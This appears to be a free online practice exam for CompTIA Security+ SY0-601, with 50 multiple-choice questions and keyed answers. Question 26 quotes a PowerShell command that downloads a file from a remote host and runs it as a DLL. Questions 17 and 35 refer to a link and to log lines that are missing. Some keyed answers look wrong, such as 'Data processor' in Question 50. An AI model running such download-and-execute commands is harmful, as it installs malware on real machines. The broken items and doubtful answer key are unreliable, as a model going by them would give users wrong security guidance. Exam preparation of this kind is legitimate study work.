
SY0-601 Practice Exam Free


SY0-601 Practice Exam Free – 50 Questions to Simulate the Real Exam

Are you getting ready for the SY0-601 certification? Take your preparation to the next level with our SY0-601 Practice Exam Free – a carefully designed set of 50 realistic exam-style questions to help you evaluate your knowledge and boost your confidence.

Using a SY0-601 practice exam free is one of the best ways to:

  • Experience the format and difficulty of the real exam
  • Identify your strengths and focus on weak areas
  • Improve your test-taking speed and accuracy

Below, you will find 50 realistic SY0-601 practice exam free questions covering key exam topics. Each question reflects the structure and challenge of the actual exam.

Question 1

A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.
Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks is on a different floor, and there are multiple routers, since the business segments environments for certain business functions.
Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet.
Which of the following is the most likely reason for this compromise?

A. A brute-force attack was used against the time-keeping website to scan for common passwords.

B. A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.

C. The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.

D. ARP poisoning affected the machines in the building and caused the kiosks to send a copy of all the submitted credentials to a malicious machine.

 


Correct Answer: C

Question 2

An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users' corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized?

A. MDM and application management

B. BYOD and containers

C. COPE and VDI

D. CYOD and VMs

 


Correct Answer: C

Question 3

Which of the following documents provides guidance regarding the recommended deployment of network security systems from the manufacturer?

A. Cloud control matrix

B. Reference architecture

C. NIST RMF

D. CIS Top 20

 


Correct Answer: B

Question 4

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

A. AUP

B. NDA

C. SLA

D. MOU

 


Correct Answer: A

Question 5

An administrator is investigating an incident and discovers several users' computers were infected with malware after viewing files that were shared with them. The administrator discovers no degraded performance in the infected machines and an examination of the log files does not show excessive failed logins. Which of the following attacks is most likely the cause of the malware?

A. Malicious flash drive

B. Remote access Trojan

C. Brute-forced password

D. Cryptojacking

 


Correct Answer: A

Question 6

Which of the following scenarios BEST describes a risk reduction technique?

A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches.

B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation.

C. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations have occurred.

D. A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

 


Correct Answer: B

Question 7

A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

A. DDoS

B. Privilege escalation

C. DNS poisoning

D. Buffer overflow

 


Correct Answer: A

Question 8

Which of the following is assured when a user signs an email using a private key?

A. Non-repudiation

B. Confidentiality

C. Availability

D. Authentication

 


Correct Answer: A

Question 9

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian

B. Data controller

C. Data protection officer

D. Data processor

 


Correct Answer: B

Question 10

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. Which of the following is the best solution to prevent this type of incident from occurring again?

A. Enforce the use of a controlled trusted source of container images.

B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.

C. Define a vulnerability scan to assess container images before being introduced on the environment.

D. Create a dedicated VPC for the containerized environment.

 


Correct Answer: A

Question 11

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion

B. Review reports

C. Log reviews

D. Threat feeds

 


Correct Answer: D

Question 12

An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security analyst notices the following:
· Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.
· Internal users in question were changing their passwords frequently during that time period.
· A jump box that several domain administrator users use to connect to remote devices was recently compromised.
· The authentication method used in the environment is NTLM.
Which of the following types of attacks is most likely being used to gain unauthorized access?

A. Pass-the-hash

B. Brute-force

C. Directory traversal

D. Replay

 


Correct Answer: A

Question 13

An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet the organization's requirement?

A. Perform OSINT investigations.

B. Subscribe to threat intelligence feeds.

C. Submit RFCs.

D. Implement a TAXII server.

 


Correct Answer: D

Question 14

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:
* Must be able to differentiate between users connected to WiFi
* The encryption keys need to change routinely without interrupting the users or forcing reauthentication
* Must be able to integrate with RADIUS
* Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?

A. WPA2-Enterprise

B. WPA3-PSK

C. 802.11n

D. WPS

 


Correct Answer: A

Question 15

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but have been able to log in without doing so. Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work.

B. An incorrect browser has been detected by the SAML application.

C. The access device has a trusted certificate installed that is overwriting the session token.

D. The user’s IP address is changing between logins, but the application is not invalidating the token.

 


Correct Answer: D

Question 16

Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the email to others?

A. Hoaxing

B. Pharming

C. Watering-hole

D. Phishing

 


Correct Answer: A

Question 17

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:
Which of the following was most likely observed?

A. DLL injection

B. Session replay

C. SQLi

D. XSS

 


Correct Answer: D

Question 18

An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate data center that houses confidential information. There is a firewall at the internet border, followed by a DLP appliance, the VPN server, and the data center itself. Which of the following is the weakest design element?

A. The DLP appliance should be integrated into a NGFW.

B. Split-tunnel connections can negatively impact the DLP appliance’s performance.

C. Encrypted VPN traffic will not be inspected when entering or leaving the network.

D. Adding two hops in the VPN tunnel may slow down remote connections.

 


Correct Answer: C

Question 19

A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use?

A. SSAE SOC 2

B. ISO 31000

C. NIST CSF

D. GDPR

 


Correct Answer: B

Question 20

The Chief Technology Officer of a local college would like visitors to utilize the school's Wi-Fi but must be able to associate potential malicious activity to a specific person. Which of the following would best allow this objective to be met?

A. Requiring all new, on-site visitors to configure their devices to use WPS

B. Implementing a new SSID for every event hosted by the college that has visitors

C. Creating a unique PSK for every visitor when they arrive at the reception area

D. Deploying a captive portal to capture visitors’ MAC addresses and names

 


Correct Answer: D

Question 21

A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the lowest possible budget. Which of the following would BEST meet the requirements?

A. Preventive controls

B. Compensating controls

C. Deterrent controls

D. Detective controls

 


Correct Answer: C

Question 22

A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST solution?

A. HIPS

B. FIM

C. TPM

D. DLP

 


Correct Answer: C

Question 23

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system. Which of the following would detect this behavior?

A. Implementing encryption

B. Monitoring outbound traffic

C. Using default settings

D. Closing all open ports

 


Correct Answer: B

Question 24

A company is implementing a vendor's security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company's standard user directory. Which of the following should the company implement?

A. 802.1X

B. SAML

C. RADIUS

D. CHAP

 


Correct Answer: B

Question 25

Company engineers regularly participate in a public Internet forum with other engineers throughout the industry. Which of the following tactics would an attacker MOST likely use in this scenario?

A. Watering-hole attack

B. Credential harvesting

C. Hybrid warfare

D. Pharming

 


Correct Answer: A

Question 26

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.

B. A PowerShell code is displaying a picture.

C. A PowerShell code is configuring environmental variables.

D. A PowerShell code is changing Windows Update settings.

 


Correct Answer: A

Question 27

Which of the following uses SAML for authentication?

A. TOTP

B. Federation

C. Kerberos

D. HOTP

 


Correct Answer: B

Question 28

An employee received multiple messages on a mobile device. The messages were instructing the employee to pair the device to an unknown device. Which of the following best describes what a malicious person might be doing to cause this issue to occur?

A. Jamming

B. Bluesnarfing

C. Evil twin attack

D. Rogue access point

 


Correct Answer: B

Question 29

A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company consult?

A. GDPR

B. ISO

C. NIST

D. PCI DSS

 


Correct Answer: A

Question 30

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

A. Air gap the system.

B. Move the system to a different network segment.

C. Create a change control request.

D. Apply the patch to the system.

 


Correct Answer: C

Question 31

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory

B. Rule-based

C. Discretionary

D. Role-based

 


Correct Answer: A

Question 32

An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?

A. Segmentation

B. Isolation

C. Patching

D. Encryption

 


Correct Answer: A

Question 33

Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility

B. Chain of custody

C. Non-repudiation

D. Admissibility

 


Correct Answer: B

Question 34

A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met:
· All actions performed by the network staff must be logged.
· Per-command permissions must be possible.
· The authentication server and the devices must communicate through TCP.
Which of the following authentication protocols should the analyst choose?

A. Kerberos

B. CHAP

C. TACACS+

D. RADIUS

 


Correct Answer: C

Question 35

A security analyst reviews web server logs and notices the following lines:

Which of the following vulnerabilities is the attacker trying to exploit?

A. Token reuse

B. SQLi

C. CSRF

D. XSS

 


Correct Answer: D

Question 36

Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?

A. EF x asset value

B. ALE / SLE

C. MTBF x impact

D. SLE x ARO

 


Correct Answer: D

Question 37

Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

A. Watering hole

B. Typosquatting

C. Hoax

D. Impersonation

 


Correct Answer: A

Question 38

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

A. Cross-site scripting

B. Buffer overflow

C. Jailbreaking

D. Side loading

 


Correct Answer: C

Question 39

An external forensics investigator has been hired to investigate a data breach at a large enterprise with numerous assets. It is known that the breach started in the perimeter network and moved to the sensitive information, generating multiple logs as the attacker traversed through the network. Which of the following will best assist with this investigation?

A. Perform a vulnerability scan to identify the weak spots.

B. Use a packet analyzer to investigate the NetFlow traffic.

C. Check the SIEM to review the correlated logs.

D. Require access to the routers to view current sessions.

 


Correct Answer: C

Question 40

A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to prevent an attack like this from happening again? (Choose three.)

A. Install DLP software to prevent data loss

B. Use the latest version of software

C. Install a SIEM device

D. Implement MDM

E. Implement a screened subnet for the web server

F. Install an endpoint security solution

 


Correct Answer: BEF

Question 41

Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

A. Faraday cages

B. Air gap

C. Vaulting

D. Proximity readers

 


Correct Answer: B

Question 42

A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is being conducted?

A. Evil twin

B. Jamming

C. DNS poisoning

D. Bluesnarfing

E. DDoS

 


Correct Answer: A

Question 43

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?

A. An external security assessment

B. A bug bounty program

C. A tabletop exercise

D. A red-team engagement

 


Correct Answer: C

Question 44

A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

A. Keylogger

B. Spyware

C. Trojan

D. Ransomware

 


Correct Answer: A

Question 45

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

A. Input validation

B. Dynamic code analysis

C. Fuzzing

D. Manual code review

 


Correct Answer: B

Question 46

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system. Which of the following best describes the actions taken by the organization?

A. Exception

B. Segmentation

C. Risk transfer

D. Compensating controls

 


Correct Answer: D

Question 47

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

A. S/MIME

B. LDAPS

C. SSH

D. SRTP

 


Correct Answer: C

Question 48

An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked FIRST?

A. DLP

B. Firewall rule

C. Content filter

D. MDM

E. Application allow list

 


Correct Answer: A

Question 49

During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should a security analyst perform FIRST to prevent this from occurring again?

A. Check for any recent SMB CVEs.

B. Install AV on the affected server.

C. Block unneeded TCP 445 connections.

D. Deploy a NIDS in the affected subnet.

 


Correct Answer: C

Question 50

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

A. Continuous deployment

B. Continuous integration

C. Data owners

D. Data processor

 


Correct Answer: D

Free Access Full SY0-601 Practice Exam Free

Looking for additional practice? Click here to access a full set of SY0-601 practice exam free questions and continue building your skills across all exam domains.

Our question sets are updated regularly to ensure they stay aligned with the latest exam objectives—so be sure to visit often!

Good luck with your SY0-601 certification journey!

PracticeTestFree.com materials do not contain actual questions and answers from Cisco's Certification Exams. PracticeTestFree.com doesn't offer Real Microsoft Exam Questions. PracticeTestFree.com doesn't offer Real Amazon Exam Questions.
